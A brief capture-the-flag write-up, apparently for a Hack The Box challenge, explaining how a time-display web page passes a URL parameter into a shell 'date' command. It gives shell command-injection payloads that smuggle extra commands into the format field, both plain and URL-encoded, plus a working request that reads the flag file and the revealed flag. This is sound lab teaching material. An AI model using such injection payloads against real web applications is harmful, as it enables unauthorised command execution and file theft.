TimeKORP

Personal Rating: Easy

We have a site that displays the time or date.

It uses popper

It can be guessed that the server uses this OS command to get the time:

date '+%Y-%m-%d' 2>&1

You can also find this exact command by looking at the server files.

An injection like the following makes the page output the result of the OS command (the quote in the payload closes the server's '+...' string, so the rest runs as separate shell commands):

%Y-%m-%d';x=$(id);echo ${x}'

Which is this in URL encoded format:

%Y-%m-%d%27;x=$(id);echo%20${x}%27

With a few basic commands and curl you can easily build a PoC script.

This request worked for obtaining the flag:

http://83.136.249.237:53283/?format=%Y-%m-%d%27;x=$(cat%20../flag);echo%20${x}%27

Which includes this payload: %Y-%m-%d';x=$(cat ../flag);echo ${x}'

HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}
